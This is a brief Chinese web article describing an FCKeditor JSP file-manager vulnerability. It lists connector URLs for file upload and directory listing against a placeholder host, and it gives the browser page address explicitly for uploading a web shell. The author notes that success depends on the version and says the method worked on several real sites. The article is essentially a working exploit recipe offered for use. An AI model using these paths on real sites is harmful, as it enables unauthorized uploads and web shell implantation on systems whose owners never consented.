欢迎来到福编程网,本站提供各种互联网专业知识!

FCKeditor JSP版漏洞

发布时间:2016-08-29 作者:佚名 来源:互联网
FCKeditor的JSP版漏洞http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2Fhttp://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/j
FCKeditor的JSP版漏洞

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

上传shell的地址:

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector

跟版本有关系.并不是百分百成功. 测试成功几个站.

不能通杀.很遗憾.

相关推荐